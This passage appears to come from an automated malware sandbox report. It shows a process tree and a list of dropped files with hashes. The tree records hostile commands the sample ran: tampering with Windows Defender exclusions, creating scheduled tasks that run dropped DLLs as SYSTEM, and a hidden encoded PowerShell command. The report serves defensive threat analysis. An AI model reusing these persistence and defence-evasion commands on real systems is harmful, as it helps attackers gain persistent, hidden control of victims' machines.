                                                                                                                                                                                                            powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                            • Drops file in System32 directory
                                                                                                                                                                                                            PID:1528
                                                                                                                                                                                                            • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                                                                              "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                PID:1796
                                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                        schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\ADJLsahCU\UaLbsl.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "FPieTEPPuEmJrhC" /V1 /F
                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                        • Drops file in Windows directory
                                                                                                                                                                                                        • Creates scheduled task(s)
                                                                                                                                                                                                        PID:1428
                                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                        schtasks /CREATE /TN "FPieTEPPuEmJrhC2" /F /xml "C:\Program Files (x86)\ADJLsahCU\BZQEovE.xml" /RU "SYSTEM"
                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                        • Creates scheduled task(s)
                                                                                                                                                                                                        PID:1984
                                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                        schtasks /END /TN "FPieTEPPuEmJrhC"
                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                          PID:1528
                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                          schtasks /DELETE /F /TN "FPieTEPPuEmJrhC"
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                            PID:2720
                                                                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                            schtasks /CREATE /TN "RMEgILKoRohUOb" /F /xml "C:\Program Files (x86)\DQANlvmTAvZU2\JGTpbPB.xml" /RU "SYSTEM"
                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                                                                            PID:2336
                                                                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                            schtasks /CREATE /TN "zeKFSgsyWsBDI2" /F /xml "C:\ProgramData\VyWMmqtuSNndeGVB\YzGZxzS.xml" /RU "SYSTEM"
                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                                                                            PID:888
                                                                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                            schtasks /CREATE /TN "VMffJjKqhXQmtrZGW2" /F /xml "C:\Program Files (x86)\AymmxTCbqblaRZJGVqR\NhcNNki.xml" /RU "SYSTEM"
                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                                                                            PID:1156
                                                                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                            schtasks /CREATE /TN "iNxHEAmPUdTkVvEiVFU2" /F /xml "C:\Program Files (x86)\PZjcxajBIsNTC\KxbbOHj.xml" /RU "SYSTEM"
                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                                                                            PID:2700
                                                                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                            schtasks /CREATE /TN "rrqYunoktxOQmCoCX" /SC once /ST 10:17:28 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\WPGfhLqOzAIwKSwi\cbdQoDVA\JsdrALJ.dll\",#1 /zlaWdidN 385118" /V1 /F
                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                            • Drops file in Windows directory
                                                                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                                                                            PID:2588
                                                                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                            schtasks /run /I /tn "rrqYunoktxOQmCoCX"
                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                              PID:2748
                                                                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                              schtasks /DELETE /F /TN "XyyyteIMwZeutaZuw"
                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                PID:2096
                                                                                                                                                                                                            • C:\Windows\system32\rundll32.EXE
                                                                                                                                                                                                              C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\WPGfhLqOzAIwKSwi\cbdQoDVA\JsdrALJ.dll",#1 /zlaWdidN 385118
                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                PID:2160
                                                                                                                                                                                                                • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                  C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\WPGfhLqOzAIwKSwi\cbdQoDVA\JsdrALJ.dll",#1 /zlaWdidN 385118
                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                  • Blocklisted process makes network request
                                                                                                                                                                                                                  • Checks BIOS information in registry
                                                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                                                  • Drops file in System32 directory
                                                                                                                                                                                                                  • Enumerates system info in registry
                                                                                                                                                                                                                  • Modifies data under HKEY_USERS
                                                                                                                                                                                                                  PID:2376
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                    schtasks /DELETE /F /TN "rrqYunoktxOQmCoCX"
                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                      PID:2508
                                                                                                                                                                                                                • C:\Windows\system32\rundll32.EXE
                                                                                                                                                                                                                  C:\Windows\system32\rundll32.EXE "C:\Program Files (x86)\PZjcxajBIsNTC\tpMFFls.dll",#1
                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                    PID:1724
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                      C:\Windows\system32\rundll32.EXE "C:\Program Files (x86)\PZjcxajBIsNTC\tpMFFls.dll",#1
                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                      • Blocklisted process makes network request
                                                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                                                      • Drops file in System32 directory
                                                                                                                                                                                                                      PID:2624
                                                                                                                                                                                                                • C:\Windows\system32\taskeng.exe
                                                                                                                                                                                                                  taskeng.exe {0A2D5D82-5105-496C-8266-6CE4B410E9D5} S-1-5-21-481678230-3773327859-3495911762-1000:UIBNQNMA\Admin:Interactive:[1]
                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                    PID:2772
                                                                                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                                                                                                                      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                      • Drops file in System32 directory
                                                                                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                      PID:2820
                                                                                                                                                                                                                      • C:\Windows\system32\gpupdate.exe
                                                                                                                                                                                                                        "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                          PID:696
                                                                                                                                                                                                                    • C:\Windows\system32\gpscript.exe
                                                                                                                                                                                                                      gpscript.exe /RefreshSystemParam
                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                        PID:2844
                                                                                                                                                                                                                      • C:\Windows\system32\conhost.exe
                                                                                                                                                                                                                        \??\C:\Windows\system32\conhost.exe "-521162472-1624630301810338007-125882673-895043269-8179304091139721871491205553"
                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                          PID:1928
                                                                                                                                                                                                                        • C:\Windows\system32\conhost.exe
                                                                                                                                                                                                                          \??\C:\Windows\system32\conhost.exe "2127264101919684482091889873-7765093532231038862031864664-2065345541302054675"
                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                            PID:2296
                                                                                                                                                                                                                          • C:\Windows\system32\conhost.exe
                                                                                                                                                                                                                            \??\C:\Windows\system32\conhost.exe "-118901766513039153071529212583-14256495601457721902571204582-497628397683980944"
                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                              PID:1708

                                                                                                                                                                                                                            Network

                                                                                                                                                                                                                            MITRE ATT&CK Enterprise v15

                                                                                                                                                                                                                            Replay Monitor

                                                                                                                                                                                                                            Loading Replay Monitor...

                                                                                                                                                                                                                            Downloads

                                                                                                                                                                                                                            • C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi

                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                              2.0MB

                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                              e1ed09d9263765a0f7b8e96118000db4

                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                              ca91d80a3b68d4fe825b8c28c3ef0c91f1c04a0d

                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                              a7bc973859f787197c782488e10c7d18fdd03e8c3c94c36c913d8f5024ce85e2

                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                              e7df159fdbc428f82fabdd9de2caf88b1d4c3ad2b7bebf66f6997d24e7afbb5a313697d68541d959b302409a5732dc59730f07e8bd81509cae23f0b1b2e92367

                                                                                                                                                                                                                            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                              344B

                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                              34b34fd643d685e86c678c97804bf2e7

                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                              44c496e60fb837b01f8c38acd84539b2a122f4f4

                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                              4a1ad6db094c80d9375da3aaf36480d7d3499afb20f084fb855ef0fe6af575a6

                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                              f7b8594c666327954770a075dd12f0312c4d9c52348c5791f3f9a8330c5fd145c353c19213fe6be6a7197733eadf221d500295c6e3baa6eeeb573c0988a54574

                                                                                                                                                                                                                            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                              344B

                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                              24bf7e557fa2fe0ef38b43f861feba1f

                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                              9d6328093294715259c9230e9f479bbed1b2bd6f

                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                              8e28b04ba015a2034256b23e1adb9ebc34d6d39bd6a72405578f0edefc7eb787

                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                              e608b9131d4303a47ca022cf020ca676d71110362589631461f3b81caa59924b04546702757f03e95ff9f3a50edf01559ba72c57ba368122b7ab6fecad0c62c1

                                                                                                                                                                                                                            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                              344B

                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                              bc3d0157b41a88514bdd932243c3378a

                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                              e8d5a44ffecf9f040879b6d27999075f2264d963

                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                              41dc6872275f18811a0a0079607ac92660ddec37b3a6fa41c86060cd918007fe

                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                              a1104eeafc15b9de90fb3c6ec5316913c74c1482159d0ccc7a72d3be75d8ec35be0d359a5f68e6001d3a69b00c35c90f47564b76a5be52c29ded78378ffe96f7

                                                                                                                                                                                                                            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                              344B

                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                              65464e86f6437abe215efbf0e07f07ce

                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                              8a2787652f38519db600586371b685bb9b6c0109

                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                              681a6b08678502c90019ee5b7435d6fae9bda47a2bf184a9cb078ae27482e15e

                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                              35c7682e9d4d029b1b18fb59ea0e2d7d4ae116785e506e3d06ced32cf689aa5802e7f7bb8b1070c167ae623f8f31bf1b040827cf9802b94e908baa7159f6d7d7

                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json

                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                              187B

                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                              2a1e12a4811892d95962998e184399d8

                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                              55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720

                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                              32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb

                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                              bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json

                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                              136B

                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                              238d2612f510ea51d0d3eaa09e7136b1

                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                              0953540c6c2fd928dd03b38c43f6e8541e1a0328

                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                              801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e

                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                              2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json

                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                              150B

                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                              0b1cf3deab325f8987f2ee31c6afc8ea

                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                              6a51537cef82143d3d768759b21598542d683904

                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                              0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf

                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                              5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                              10KB

                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                              ce71278ed33f0f824e4a2137d05c61e1

                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                              614df90b0b3fb3eac1324e8315f659349c6e8da0

                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                              feac440438cf820e4a43dbd5053e9bed992468d0524c476b67164905f39ce8f6

                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                              f1e227f0b03918025a7db0eeff177773da966cec624d6bce5c6347ef4ff8fb49093edd3595face874e0fd7c2ac220edc7a3d8130be5b7e72ca9c1e1c97851029

                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                              27KB

                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                              bef97fa7e194230e4c8666c7ae27a54e

                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                              9e963dbd8d2e07337f2fea2d140006b6f574c746

                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                              8133919c102e57dbfae83f390c1642635dc9711acf891555867370925dc73784

                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                              f26d991d94766a58ce9084bd11517a230e15d3b3d1264ff6d5471588d6416538d7d61921a749c84f59f293221789f18d9895f3d1ee8e9ede1f8470031fccc173

                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\ApplicationInsights\cb82900d7c0d19605a9c1adc1be5fc0aee77ab3bfdbb4ee40526b56ef2d7a2ce\4e5efc12e5c644cb963335a9ecf70fdd.tmp

                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                              1KB

                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                              2c5031ae04b4842d9dbf0b3ebe6b3c80

                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                              205036537b9956d63c79e5f03f58aa21cc85cb8e

                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                              48a78f56ba2ebc30cd27658575e544e9ba5c22b289efa74e6f84c5838701b2a7

                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                              4c012fb9a339918ab9da254d80063198ec1aed71e056b48e833af4b4fe8fcfb1a8c338880a8a7469395b5332248a04febce9da5158c9149be3107d04f27abaab

                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Cab3342.tmp

                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                              68KB

                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                              29f65ba8e88c063813cc50a4ea544e93

                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                              05a7040d5c127e68c25d81cc51271ffb8bef3568

                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                              1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                              e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Tar33B3.tmp

                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                              177KB

                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                              435a9ac180383f9fa094131b173a2f7b

                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                              76944ea657a9db94f9a4bef38f88c46ed4166983

                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                              67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                              1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                              281KB

                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                              d98e33b66343e7c96158444127a117f6

                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                              bb716c5509a2bf345c6c1152f6e3e1452d39d50d

                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                              5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1

                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                              705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5

                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\iolo\dm\ioloDMLog.txt

                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                              2KB

                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                              757d2b640b94e39a47cbc7f6666ae310

                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                              fe186bf4be6917843850daa7a73162e2ad4c3c47

                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                              8fdf01a9f4c138ec2e8252976ce7bdece5d915b5444c0c03105eb86a1e65aabc

                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                              5320c14ae571f06b98ab76b852f285d694da2cff98201e5a95d7380b24b33998401b55fc80ddf3c7aa3ecbbf8931ddaad681c59b93c65696bc3306dd3825aec7

                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\iolo\dm\ioloDMLog.txt

                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                              3KB

                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                              23e2af2bc97149ec76aae69c8eff649b

                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                              ec8ab801cf89188aa60b57bf3fbbb22f00a6a46e

                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                              0c464003e3dc6ae3c8c063749058632b217a600e61d53675c02d2510acfb3d55

                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                              74acb8b21185792b2d7a68b8e490d727228f3d8133b2142488d59f84e08a0fd747efeb41d384bbcca99bb7e21251693f1722139014e7336da7a4504671ab9a16

                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                              5.3MB

                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                              1afff8d5352aecef2ecd47ffa02d7f7d

                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                              8b115b84efdb3a1b87f750d35822b2609e665bef

                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                              c41acc53cde89b94d55d6932ddd55a212ba910e1fade3da138670bb5b18ae4e1

                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                              e5dc54c60be702e11772dc729eec5ec7140f293545aa3d57282adacddf686483393b0c940bbd397a9d50a6cda093865b143ae00c51ce3bf5d6b00241f97b3cdb

                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\tLVYvupllyMnDiy\ZYCmLit.exe

                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                              6.4MB

                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                              220a02a940078153b4063f42f206087b

                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                              02fc647d857573a253a1ab796d162244eb179315

                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                              7eb93d93b03447a6bafd7e084305d41bf9780bd415cb2e70020952d06f3d7b60

                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                              42ac563a7c28cbf361bfb150d5469f0278ab87ce445b437eef8425fb779689d70230b550815f30f9db2909c1ba0dd015b172dfe3e718d26706856f4cb0eeeeaa

                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ty9peokp.default-release\prefs.js

                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                              7KB

                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                              aaebdc5f2a6f5d9f016c81aa0b86dfe8

                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                              b98a8979f19a6343fe2fab0a2a658807a4ef572b

                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                              31e983e2ff76fb276f17af609d6165013e7a2ce79661cce651642713f3c8a9e3

                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                              227bf13879ca5614b371bd3b48b8e39b5f0dd40bf4ef2a251c9014b99ddb203a9b89af9a8e0432d1715d53cd020c2302a6cb1f778a9973a339e5cfb8e73f2e9f

                                                                                                                                                                                                                            • C:\Users\Admin\Pictures\MPYgUYg7TICU1jZEJCtJmCRi.exe

                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                              5.5MB

                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                              26193ade61357f8be316a489dfbe08c7

                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                              12f618f5c00f81477f7dfbb513d88c66166e1aed

                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                              cd08d7d53e4206301c103aa6db8cf423e289679a203973a0c7c13404e7490e48

                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                              881f6cbd27adf3f038a6ae2c9ee20af97ba0502c775d95bbc47d1a605691bdc3158129fa6123b9256202d34d40e48e90a1e7863d0d1c03d0e3672bada6c61c9a

                                                                                                                                                                                                                            • C:\Windows\windefender.exe

                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                              2.0MB

                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                              8e67f58837092385dcf01e8a2b4f5783

                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                              012c49cfd8c5d06795a6f67ea2baf2a082cf8625

                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                              166ddb03ff3c89bd4525ac390067e180fdd08f10fbcf4aadb0189541673c03fa

                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                              40d8ae12663fc1851e171d9d86cea8bb12487b734c218d7b6f9742eb07d4ca265065cbd6d0bb908f8bda7e3d955c458dfe3fd13265bbf573b9351e0a2bf691ec

                                                                                                                                                                                                                            • \ProgramData\mozglue.dll

                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                              593KB

                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                              c8fd9be83bc728cc04beffafc2907fe9

                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                              95ab9f701e0024cedfbd312bcfe4e726744c4f2e

                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                              ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                              fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

                                                                                                                                                                                                                            • \ProgramData\nss3.dll

                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                              2.0MB

                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                              1cc453cdf74f31e4d913ff9c10acdde2

                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                              6e85eae544d6e965f15fa5c39700fa7202f3aafe

                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                              ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5

                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                              dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

                                                                                                                                                                                                                            • \Users\Admin\AppData\Local\Temp\csrss\patch.exe

                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                              1.7MB

                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                              13aaafe14eb60d6a718230e82c671d57

                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                              e039dd924d12f264521b8e689426fb7ca95a0a7b

                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                              f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3

                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                              ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3

                                                                                                                                                                                                                            • \Users\Admin\AppData\Local\Temp\dbghelp.dll

                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                              1.5MB

                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                              f0616fa8bc54ece07e3107057f74e4db

                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                              b33995c4f9a004b7d806c4bb36040ee844781fca

                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                              6e58fcf4d763022b1f79a3c448eb2ebd8ad1c15df3acf58416893f1cbc699026

                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                              15242e3f5652d7f1d0e31cebadfe2f238ca3222f0e927eb7feb644ab2b3d33132cf2316ee5089324f20f72f1650ad5bb8dd82b96518386ce5b319fb5ceb8313c

                                                                                                                                                                                                                            • \Users\Admin\AppData\Local\Temp\osloader.exe

                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                              591KB

                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                              e2f68dc7fbd6e0bf031ca3809a739346

                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                              9c35494898e65c8a62887f28e04c0359ab6f63f5

                                                                                                                                                                                                                              SHA256

